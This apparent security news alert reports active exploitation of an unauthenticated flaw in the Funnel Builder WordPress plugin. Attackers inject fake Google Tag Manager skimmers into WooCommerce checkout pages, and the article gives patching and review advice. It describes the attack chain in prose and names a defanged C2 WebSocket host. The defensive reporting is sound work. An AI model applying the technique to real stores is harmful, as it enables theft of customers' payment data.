Urgent Alert: Funnel Builder Vulnerability Under Active Attack
A severe security flaw within the popular Funnel Builder plugin for WordPress is currently being exploited in the wild, posing a significant threat to e-commerce businesses. Attackers are leveraging this vulnerability to inject malicious JavaScript into WooCommerce checkout pages, with the explicit aim of siphoning sensitive payment information from unsuspecting customers. This critical issue, affecting over 40,000 WooCommerce stores, has been brought to light by security researchers at Sansec.
The Anatomy of the Attack: How Skimmers Infiltrate Your Checkout
The vulnerability, which lacks an official CVE identifier but impacts all Funnel Builder plugin versions prior to 3.15.0.3, allows unauthenticated attackers to inject arbitrary JavaScript code directly into every checkout page. Sansec, a Dutch e-commerce security firm, detailed how this is achieved:
Exploiting a Publicly Exposed Endpoint
Older versions of Funnel Builder contained a publicly accessible checkout endpoint designed to run various internal methods. Crucially, these versions failed to implement proper permission checks or restrict which methods could be invoked. This oversight created a critical loophole, enabling malicious actors to send unauthenticated requests that could trigger an internal method to write attacker-controlled data into the plugin’s global settings.
Disguised Malice: Fake Google Tag Manager Scripts
Once the attacker gains this foothold, they plant fake Google Tag Manager (GTM) scripts into the plugin’s ‘External Scripts’ setting. These malicious scripts are cunningly designed to mimic legitimate analytics code, often blending seamlessly with a store’s genuine tracking tags. This deceptive tactic, a recurring pattern in ‘Magecart’ attacks, allows the skimmer to evade casual detection by reviewers who might overlook anything resembling familiar analytics.
The Skimmer in Action: Real-time Data Theft
Sansec observed instances where the injected payload, masquerading as a GTM loader, launched JavaScript hosted on a remote domain. This script then establishes a WebSocket connection to the attacker’s command-and-control (C2) server (e.g., “wss://protect-wss[.]com/ws”). From this C2 server, a sophisticated skimmer, often tailored to the victim’s specific storefront, is retrieved and deployed. The ultimate objective is clear: to steal credit card numbers, CVVs, billing addresses, and other personal data entered by customers during checkout.
Immediate Action Required: Protect Your Customers and Business
FunnelKit, the maintainers of Funnel Builder, have responded swiftly by releasing a patch in version 3.15.0.3. All WooCommerce store owners utilizing the Funnel Builder plugin are strongly advised to:
- Update Immediately: Upgrade the Funnel Builder plugin to version 3.15.0.3 or later without delay.
- Scrutinize External Scripts: Navigate to
Settings > Checkout > External Scriptswithin your WordPress dashboard and meticulously review for any unfamiliar or suspicious code snippets. Remove anything that cannot be positively identified as legitimate.
A Broader Threat Landscape: Beyond Funnel Builder
This incident underscores the persistent and evolving nature of cyber threats targeting e-commerce platforms. It follows closely on the heels of a separate campaign detailed by Sucuri, where Joomla websites were found to be backdoored with obfuscated PHP code. These backdoors allowed attackers to contact C2 servers, receive instructions, and serve spammy content to visitors and search engines, leveraging the sites’ reputation for malicious purposes. As security researcher Puja Srivastava noted, such remote loaders grant attackers dynamic control, enabling them to alter compromised website behavior at will, injecting spam, redirecting visitors, or displaying malicious pages without further local file modifications.
The Funnel Builder vulnerability serves as a stark reminder that proactive security measures and vigilance are paramount in safeguarding online businesses and customer trust.
For more details, visit our website.
Source: Link
Leave a comment